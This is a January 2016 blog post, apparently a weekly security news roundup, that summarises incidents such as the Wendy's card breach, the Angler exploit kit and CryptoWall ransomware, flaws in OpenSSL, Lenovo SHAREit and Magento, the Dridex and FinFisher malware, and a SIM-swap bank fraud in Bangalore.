Sunday, January 31, 2016

Issue 49 - Week of Jan 25th


1.       Wendy's investigates possible data breach: Wendy's is an American international fast food restaurant chain, like McDonald and Burger King. Last week, Wendy's confirmed in a statement that they have launched a comprehensive investigation - after learning of reports that fraudulent charges may have occurred elsewhere after payment cards were legitimately used at some of its restaurants. Target data breach -probably tops the PoS hacks; P.F. Chang's and Dairy Queen are other recent victims in the food business. EMV cards (Chip and PIN Credit card), contact-less credit cards with NFC (Near Field Communication) and RFID technology which do not require swiping of card  - lower the chances of data leakage.

2.       Another Angler exploit kit victim: Last issue we discussed Officeholiday[.]com, on similar lines - a famous European transport company's website was hacked and visitors were silently redirected to Angler EK, which then exploited the latest known vulnerabilities in Adobe Flash Player to downloaded and execute CryptoWall 4.0 ransomware. Angler EK continues to be one of the biggest threats, it tends to exploit newest vulnerabilities in Adobe Flash Player and uses high profile websites. It is important to keep up to date with software updates, especially for Adobe Flash Player which is often the weapon of choice for malware actors when it comes to finding vulnerabilities.

3.       Bumper week for Ransomware: Apart from the above transport company, other big victims of Ransomware last week were - Israeli Electric Authority & Lincolnshire County Council (in UK). It also surfaced that hackers are now using fake salesforce notifications to LURE users to click links or download malicious attachments leading to ransomware. Android ransomware - Lockdroid was in news, New ransomware detected called 7ev3n, which demands 13 bitcoins which is a deviation from the usual demand of 1 bitcoin.

4.       Hackers launch cyberattack against cPanel systems: cPanel, is a Texas based company that offers Web hosting platform management tool and is used by millions. Last week, the company said in a statement that one of the cPanel customer databases "may" have been breached. cPanel was able to "interrupt" the breach, and so it is not known whether customer data was exposed. The database included names, contact information and passwords. However, luckily for users, the passwords were encrypted and salted, which makes it difficult for cyberattackers to crack and elicit this account data. All users of this service are advised to change their passwords.

5.       Critical Open SSL bug patched: OpenSSL is an open-source library that is the most widely used in applications and Websites for secure data transfers using SSL or TLS encryption. However, after serious security vulnerabilities were discovered in OpenSSL over the last few years, the crypto library has been under much investigation by security researchers. The OpenSSL Foundation has released the promised patch for a high severity vulnerability in its cryptographic code library that let attackers obtain the key to decrypt HTTPS & TLS based communications. The latest bugs affect OpenSSL versions 1.0.1 and 1.0.2, which has been patched in new releases of OpenSSL, versions 1.0.1r and 1.0.2f.

6.       Lenovo used third 'worst password' in file-sharing backdoor flaw: Recall the image that we used in Issue 48, '12345678' is the third worst password and Lenovo has hardcoded that to its  file sharing software SHAREit that could be exploited by anyone who can guess this password. Researchers have disclosed four vulnerabilities in Lenovo ShareIT, the worst of which is – ‘Lenovo ShareIt for Windows’, which when configured to receive files, a Wi-Fi HotSpot is set with the hardcoded password, any system with a Wi-Fi Network card could connect to that Hotspot by using '12345678' as password. The vulnerabilities were discovered and privately disclosed to Lenovo in Oct’15 and have been patched last week.

7.       Critical Flaws in Magento leave Millions of E-Commerce Sites at Risk: If you are using Magento to run your e-commerce website, it's time for you to update it now. Millions of online merchants are at risk of hijacking attacks due to a number of critical cross-site scripting (XSS) vulnerabilities in the Magento. Virtually all versions of Magento Community and Enterprise Edition, are vulnerable to the Stored Cross-Site Scripting (XSS) flaws. The flaws are awful as they allow attackers to take over the site, Escalate user privileges, Siphon customers’ data and Steal credit card information. However, the good news is that the vulnerabilities are patched, and an update has been made available to the public after a security firm discovered and privately reported the vulnerability to the company.

8.       Dridex Trojan targets UK banks, avoids two factor authentication checks: The latest version of Dridex was first detected this month, it is believed to be responsible for stealing up to £20 million from UK accounts. Dridex spreads through email phishing campaigns and includes features such as the ability to spy on victim PCs, with the overall aim of stealing credentials which can be used to access bank accounts and cash reserves. When the victim tries to access any banks, the Trojan will redirect the user to a fake replica and harvest credentials including the 2FA codes.

9.       FinFisher spyware linked to Indonesian government found in Sydney: This spyware is capable of remotely controlling any computer it infects, copy files, intercept Skype calls, and log keystrokes. The sophisticated spyware suite is usually sold to government agencies. Last week, an instance of this belonging to the Indonesian government was found in Australian Datacenter. That would mean -Information from users infected by an Indonesian department was going through Australia. In 2013, the Australian government was accused of spying on Indonesia thanks to the documents leaked by Edward Snowden. Now, it looks like the Indonesians are taking revenge from the kangaroos.


10.   If your SIM stops working, check your bank account: A tech entrepreneur in Bangalore has joined the long list of victims of phishing. Criminals procured a duplicate SIM card of the victim and siphoned off ₹ 45 lakh (≈$70k) between January 13 and January 18. A few days after his mobile phone stopped functioning, he went to the Reliance store to enquire about the reason. He was informed about the issue of a duplicate SIM card. Criminals procured a duplicate SIM card from a Reliance store at Jayanagar by producing a copy of his Aadhaar card. This new SIM card was used to siphon the money.  Service providers should be more careful in issuing duplicate SIMs, maybe they should call the number once or have some other sensible checks.

No comments:

Post a Comment